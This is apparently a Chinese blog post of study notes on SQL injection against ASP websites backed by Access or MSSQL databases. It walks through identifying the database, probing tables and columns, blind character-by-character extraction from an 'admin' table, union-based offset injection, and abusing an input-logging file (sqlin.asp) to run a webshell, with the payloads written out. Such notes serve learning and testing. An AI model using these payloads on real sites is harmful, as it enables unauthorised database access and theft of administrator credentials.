-
access是没有数据库的;只有表
-
流程
- 判断数据库类型--->判断表名----> 判断列名---->判断列名长度(列中第一条记录数据长度)---->读取数据
-
asp网站常用数据库:access和mssql数据库
-
判断数据库
- 如果有msysobjects则是access数据库;如果有sysobjects则是sqlsever数据库
- and exists (select * from msysobjects)>0 access
- and exists (select * from sysobjects)>0 sqlserver
-
查表
- and exists (select * from 表名)
-
查列名
- and exists (select 列名 from 表名)
-
判断列名长度
- and (select top 1 len(列名) from 表名)>5 :列名是否大于5
-
逐字符爆破
- and (select top 1 asc(mid(user,1,1)) from admin)=97
- asc() 返回字符的ascii码
- top 1 :只返回最上面一条数据
-
偏移注入(需要结合联合查询)
- 联合查询补充字段数=当前表的字段数-查询表的字段数*N
- union select 1,2,3,4,5,,,* from admin_user :*代表了admin_user的总字段数的倍数
-
通用性防注入
- 将输入的行为存放到sqlin.asp文件中;类似于日志
- 该操作会导致文件木马程序的执行;相当于文件上传了
Access数据库
I_WORM2024-04-09 14:48
相关推荐
玩转测试开发几秒前
xshell设置跳板机登录内网服务器你不是我我12 分钟前
【Java 开发日记】运行时有出现过什么异常?夏玉林的学习之路1 小时前
正则表达式JIngJaneIL1 小时前
财务管理|基于SprinBoot+vue的个人财务管理系统(源码+数据库+文档)JIngJaneIL2 小时前
口腔健康系统|口腔医疗|基于java和小程序的口腔健康系统小程序设计与实现(源码+数据库+文档)白帽子黑客罗哥2 小时前
常见Web安全漏洞全解析:从原理到防御的实战指南寒山李白4 小时前
IDEA连接MySQL服务器数据库指南亿坊电商7 小时前
PHP后端项目中多环境配置管理:开发、测试、生产的优雅解决方案!韩立学长7 小时前
基于Springboot的影视评论网站的设计与实现58py6238(程序、源码、数据库、调试部署方案及开发环境)系统界面展示及获取方式置于文档末尾,可供参考。未来之窗软件服务8 小时前
未来之窗昭和仙君(四十七)开发商品进销存——东方仙盟筑基期